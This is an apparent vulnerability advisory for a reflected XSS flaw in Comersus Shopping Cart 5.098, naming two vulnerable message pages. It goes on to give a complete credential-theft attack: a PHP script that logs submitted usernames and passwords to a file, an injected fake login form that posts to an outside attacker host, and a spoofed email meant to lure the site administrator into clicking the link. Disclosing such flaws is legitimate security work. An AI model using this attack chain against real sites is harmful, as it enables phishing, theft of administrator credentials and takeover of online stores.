Comersus Shopping Cart 5.098 XSS Vulnerability ======================================================= Vulnerable Systems: * Comersus Cart Version 5.098 Comersus is an open source shopping cart.I found a few XSS Vulnerabilty : Pages Affected: /comersus/store/comersus_message.asp /comersus/backofficeLite/comersus_backoffice_message.asp Examples: http://www.target.net/comersus/store/comersus_message.asp?message=<h4>VULNERABLE</h4> http://www.target.net/comersus/backofficelite/comersus_backoffice_message.asp?message=<h4>VULNERABLE</h4> Try this : 1 Step : Create a file called comersus.php <? $buka = fopen("comersus.txt","a+"); fwrite($buka,"User:".$uid."|"."Password:".$passwd."|"); fclose($buka); header("Location:http://www.target.net/comersus/backofficelite/comersus_backoffice_message.asp?message=Your+authentication+data+is+incorrect...";); exit(); ?> Next Step : Open url : http://www.target.net/comersus/backofficelite/comersus_backoffice_message.asp?message=<form%20action=http://mysite.org/comersus.php%20method=post><h3>BackOffice%20Lite</h3><p>User<br><input%20type=text%20name=uid><br>Password<br><input%20type=password%20name=passwd><p><input%20type=submit%20value=%20Login%20></form> Enter user and password,then Submit After that, enter this url: http://mysite.org/comersus.txt This is a result(comersus.txt) : User:az001|Password:passwordnya| Sent a fake email from Comersus Site(support@xxxxxxxxxxxx) to www.target.net admin (ex. admin@xxxxxxxxxx): Hello admin@xxxxxxxxxx blablablablabla ............................................... ................................................................ Please Login with username and password <a href="http://www.target.net/comersus/backofficelite/comersus_backoffice_message.asp?message=<form%20action=http://mysite.org/comersus.php%20method=post><h3>BackOffice%20Lite</h3><p>User<br><input%20type=text%20name=uid><br>Password<br><input%20type=password%20name=passwd><p><input%20type=submit%20value=%20Login%20></form>">here</a> and Wait until admin execute url
